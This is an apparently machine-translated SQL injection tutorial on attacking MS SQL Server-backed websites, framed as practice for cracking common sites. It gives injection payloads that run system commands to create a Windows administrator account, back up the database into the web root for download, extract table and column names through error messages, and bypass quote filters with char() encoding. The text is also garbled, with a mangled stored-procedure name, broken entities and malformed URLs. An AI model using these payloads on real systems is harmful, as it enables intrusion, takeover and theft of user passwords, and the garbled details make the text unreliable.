High Level
After reading the introductory and advanced articles, you can practice a little bit to crack common websites. However, if you cannot guess the table name or the program author filters out some special characters, how can you improve the injection success rate? How can we improve the efficiency of guessing? Next, read the advanced article.
Section 1. inject SQL Server databases using system tables
Sqlserver is a powerful database system that is closely related to the operating system, which brings great convenience to developers. On the other hand, it also provides a stepping stone for injecting users, let's take a look at several specific examples:
& #9312; master .. xp_mongoshell "Net user name password/Add" -- semicolon; In sqlserver, it indicates to separate the first and second statements. -- It indicates that the subsequent statements are comments. Therefore, this statement is divided into two statements in sqlserver for execution. First, select the record with ID = 1 and then execute the Stored Procedure xp_mongoshell. This stored procedure is used to call system commands. Therefore, run the "Net" command to create a Windows account with the username and password, and then:
& #9313; master .. xp_mongoshell "net localgroup administrators name/Add" -- add the new account name to the Administrator Group. It takes no longer two minutes for you to obtain the highest system permission! Of course, this method only applies when using SA to connect to the database. Otherwise, you do not have the permission to call xp_mongoshell.
& #9314;
Http: // site/url. asp? Id = 1And db_name ()> 0 there is a similar example before and user> 0, the role is to get the connection user name, db_name () is another system variable, the return is the name of the connected database.
& #9315; database name to disk = 'C: \ Inetpub \ wwwroot \ 1.db'; -- this is a pretty cool trick, obtained from & #9314; Database Name, in addition to the absolute paths exposed by some IIS errors, back up the database to the web directory and Use http to download the entire database. All the administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can also back up the method to the network address (for example), but the success rate is not high.
& #9316;
Http: // site/url. asp? Id = 1And (select top 1 name from sysobjects where xtype = u and status> 0)> 0 as mentioned earlier, sysobjects is the system table of sqlserver, all table names, views, constraints, and other objects are stored. xtype = u and status> 0 indicates the table name created by the user. The preceding statement extracts the first table name, compare with 0 to expose the table name with the error message. 2. How can I obtain the name of the third table? Let's leave it to our smart readers.
& #9317;
Http: // site/url. asp? Id = 1And (select top 1 col_name (object_id (table name), 1) from sysobjects)> 0 from & #9316; after obtaining the table name, use object_id ('table name ') obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table. Replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.
The above six points are the painstaking efforts I have studied sqlserver for more than half a year. We can see that the degree of understanding of sqlserver directly affects the success rate and the speed of guessing. After studying sqlserver injection, my development level has also been greatly improved. Haha, maybe security and development are complementary. Section 2. Continued injection by bypassing program restrictions as mentioned in the Getting Started article, many people prefer to use the code test to inject vulnerabilities. Therefore, many also use the code filter method to "prevent" injection vulnerabilities, this may block some hacker attacks, but those familiar with SQL injection can still use related functions to bypass program restrictions. In the "general steps of SQL injection" section, all the statements I use are optimized by me so that they do not contain single quotes; in "injecting SQL Server database with system tables", some statements contain numbers. Let's take an example to see how to modify these statements: simple where xtype = u, the ASCII code of character U is 85, so it can be replaced by where xtype = char (85). If the character is Chinese, such as where name = user, you can use where name = nchar (29992) + nchar (25143) instead. # Database Technology
